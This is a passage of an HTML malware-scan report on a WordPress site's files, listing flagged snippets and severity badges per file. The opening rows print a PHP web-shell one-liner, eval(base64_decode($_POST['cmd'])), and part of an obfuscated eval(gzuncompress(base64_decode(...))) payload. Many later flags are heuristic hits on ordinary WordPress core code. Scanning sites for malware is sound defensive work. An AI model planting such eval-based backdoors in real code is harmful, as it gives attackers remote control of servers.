<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'cmd'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'body'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'eF7svXt/20auMPz/8/s932GidY+kRBdfcmmdOoljK42fdWzXVtqeE2f10hJlc0OJKkn50k3OZ38BzJ0cUpTt9LRny93GNjmDwWAwGAwGA7wKpsEg8dNG3Y/jKB6E0Xm9xQ7e7+83n//f//NKfYX3AyqRwOdV+9vEC8KONxoNrgcXvjfy43wR/3oWJf5gdjGrtyrUrkfjcb0YguszYR/7syhOg+l5HoNRkMxC7ybTiZUoHAHIxA/HbIutDE56xz/1jj/Uj94ewe/7b+ofRaHYn0QpoDeKrXLHvXeH/d5ge3f3mIpCYQcMqFLr1p6bH62KFkj+U4Mchl6SsJN3/SP2r//7fxg83YcP+S/sIeMfEj++9GOGnddfXl16MQum6k2X/zKbn4XBkK1gxcHR4XEfWl9/Qri7gQNRwxsWBlOf+dMREJc1RtG0nrLhhTc995uZFpM0hjIFje4c779Bapz...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 11413268 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 11413268)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_23").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-admin/includes/class-wp-filesystem-ssh2.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 13.43 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:18</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_24" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function posix_getpwuid <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `posix_getpwuid`</p><p><i>[<a href="https://www.php.net/posix_getpwuid" target="_blank" class="text-primary">https://www.php.net/posix_getpwuid</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">posix_getpwuid</span><span style="color: #007700">(</span><span style="color: #0000BB">$owneruid</span><span style="color: #007700">);&nbsp;return&nbsp;</span><span style="color: #0000BB">$ownerarray</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">];&nbsp;}&nbsp;public&nbsp;function&nbsp;</span><span style="color: #0000BB">getchmod</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">substr</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">decoct</span><span style="color: #007700">(&nbsp;@</span><span style="color: #0000BB">fileperms</span><span style="color: #007700">(&nbsp;</span><span style="color: #DD0000">'ssh2.sftp://'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">sftp_link&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'/'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">ltrim</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$file</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'/'&nbsp;</span><span style="color: #007700">)&nbsp;)&nbsp;),&nbsp;-</span><span style="color: #0000BB">3&nbsp;</span><span style="color: #007700">);&nbsp;}&nbsp;public&nbsp;function&nbsp;</span><span style="color: #0000BB">group</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$gid&nbsp;</span><span style="color: #007700">=&nbsp;@</span><span style="color: #0000BB">filegroup</span><span style="color: #007700">(</span><span style="color: #DD0000">'ssh2.sftp://'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">sftp_link&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'/'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">ltrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'/'</span><span style="color: #007700">));&nbsp;if&nbsp;(&nbsp;!&nbsp;</span><span style="color: #0000BB">$gid&nbsp;</span><span style="color: #007700">)&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;if&nbsp;(&nbsp;!&nbsp;</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'posix_getgrgid'</span><span style="color: #007700">)&nbsp;)&nbsp;return&nbsp;</span><span style="color: #0000BB">$gid</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$grouparray&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">posix_getgrgid</span><span style="color: #007700">(</span><span style="color: #0000BB">$gid</span><span style="color: #007700">);&nbsp;return&nbsp;</span><span style="color: #0000BB">$grouparray</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">];&nbsp;}&nbsp;public&nbsp;function&nbsp;</span><span style="color: #0000BB">copy</span><span style="color: #007700">(</span><span style="color: #0000BB">$source</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$destina</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_24").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-admin/includes/file.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 48.00 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:18</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_25" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 211</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$overrides</span><span style="color: #007700">[</span><span style="color: #DD0000">'upload_error_handler'</span><span style="color: #007700">](&amp;</span><span style="color: #0000BB">$file</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$message&nbsp;</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_25").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-admin/includes/class-pclzip.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 191.03 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:18</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 5</span><br><table id="file_26" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2622</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_PRE_ADD</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_PRE_ADD</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2775</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_POST_ADD</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_POST_ADD</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3697</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_PRE_EXTRACT</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_PRE_EXTRACT</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3943</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_POST_EXTRACT</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_POST_EXTRACT</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5672</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_26").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-admin/includes/class-wp-filesystem-direct.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 10.91 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:18</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_27" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function posix_getpwuid <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `posix_getpwuid`</p><p><i>[<a href="https://www.php.net/posix_getpwuid" target="_blank" class="text-primary">https://www.php.net/posix_getpwuid</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">posix_getpwuid</span><span style="color: #007700">(</span><span style="color: #0000BB">$owneruid</span><span style="color: #007700">);&nbsp;return&nbsp;</span><span style="color: #0000BB">$ownerarray</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">];&nbsp;}&nbsp;public&nbsp;function&nbsp;</span><span style="color: #0000BB">getchmod</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">substr</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">decoct</span><span style="color: #007700">(&nbsp;@</span><span style="color: #0000BB">fileperms</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$file&nbsp;</span><span style="color: #007700">)&nbsp;),&nbsp;-</span><span style="color: #0000BB">3&nbsp;</span><span style="color: #007700">);&nbsp;}&nbsp;public&nbsp;function&nbsp;</span><span style="color: #0000BB">group</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$gid&nbsp;</span><span style="color: #007700">=&nbsp;@</span><span style="color: #0000BB">filegroup</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">);&nbsp;if&nbsp;(&nbsp;!&nbsp;</span><span style="color: #0000BB">$gid&nbsp;</span><span style="color: #007700">)&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;if&nbsp;(&nbsp;!&nbsp;</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'posix_getgrgid'</span><span style="color: #007700">)&nbsp;)&nbsp;return&nbsp;</span><span style="color: #0000BB">$gid</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$grouparray&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">posix_getgrgid</span><span style="color: #007700">(</span><span style="color: #0000BB">$gid</span><span style="color: #007700">);&nbsp;return&nbsp;</span><span style="color: #0000BB">$grouparray</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">];&nbsp;}&nbsp;public&nbsp;function&nbsp;</span><span style="color: #0000BB">copy</span><span style="color: #007700">(</span><span style="color: #0000BB">$source</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$destination</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$overwrite&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$mode&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(&nbsp;!&nbsp;</span><span style="color: #0000BB">$overwrite&nbsp;</span><span style="color: #007700">&amp;&amp;&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">exists</span><span style="color: #007700">(</span><span style="color: #0000BB">$destination</span><span style="color: #007700">)&nbsp;)&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$r</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_27").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-admin/includes/ms.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 33.09 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:18</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_28" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function str_rot13 eval_str_rot13 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 579</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">riny</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_28").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-includes/ID3/module.audio-video.quicktime.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 115.66 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:18</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:31</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_29" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function str_rot13 eval_str_rot13 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1560</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">riny</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_29").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-includes/pluggable.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 77.25 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:18</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:31</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_30" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign 11413268 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1070</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 11413268)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">exploit</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_30").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-includes/class-snoopy.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 36.89 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:18</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:31</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_31" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">curl_path</span><span style="color: #007700">.</span><span style="color: #DD0000">"&nbsp;-k&nbsp;-D&nbsp;\"</span><span style="color: #0000BB">$headerfile</span><span style="color: #DD0000">\""</span><span style="color: #007700">.</span><span style="color: #0000BB">$cmdline_params</span><span style="color: #007700">.</span><span style="color: #DD0000">"&nbsp;\""</span><span style="color: #007700">.</span><span style="color: #0000BB">escapeshellcmd</span><span style="color: #007700">(</span><span style="color: #0000BB">$URI</span><span style="color: #007700">).</span><span style="color: #DD0000">"\""</span><span style="color: #007700">,</span><span style="color: #0000BB">$results</span><span style="color: #007700">,</span><span style="color: #0000BB">$return</span><span style="color: #007700">);&nbsp;if(</span><span style="color: #0000BB">$return</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">error&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"Error:&nbsp;cURL&nbsp;could&nbsp;not&nbsp;retrieve&nbsp;the&nbsp;document,&nbsp;error&nbsp;</span><span style="color: #0000BB">$return</span><span style="color: #DD0000">."</span><span style="color: #007700">;&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;}&nbsp;</span><span style="color: #0000BB">$results&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">,</span><span style="color: #0000BB">$results</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$result_headers&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">file</span><span style="color: #007700">(</span><span style="color: #DD0000">"</span><span style="color: #0000BB">$headerfile</span><span style="color: #DD0000">"</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">_redirectaddr&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;unset(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">headers</span><span style="color: #007700">);&nbsp;for(</span><span style="color: #0000BB">$currentHeader&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$currentHeader&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$result_headers</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$currentHeader</span><span style="color: #007700">++)&nbsp;{&nbsp;if(</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">"/^(Location:&nbsp;|URI:&nbsp;)/i"</span><span style="color: #007700">,</span><span style="color: #0000BB">$result_headers</span><span style="color: #007700">[</span><span style="color: #0000BB">$currentH</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_31").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-includes/SimplePie/Parse/Date.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 19.22 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:18</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:31</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_32" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit concat_vars_with_spaces <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 786</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of vars technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$day&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$fws&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$month&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$fws&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$year&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$fws&nbsp;</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_32").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/liko-holding.com.ua/wp-includes/kses.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 47.60 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:18</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:31</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_33" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign 1414e381 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 905</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 1414e381)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$mode&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$attrname&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$uris&nbsp;</span><span style="color: #007700">=&nbsp;array(</span><span style="color: #DD0000">'xmlns'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'profile'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'href'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'src'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'cite'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'classid'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'codebase'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'data'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'usemap'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'longdesc'</span><span style="color: #007700">,</span>
</span>
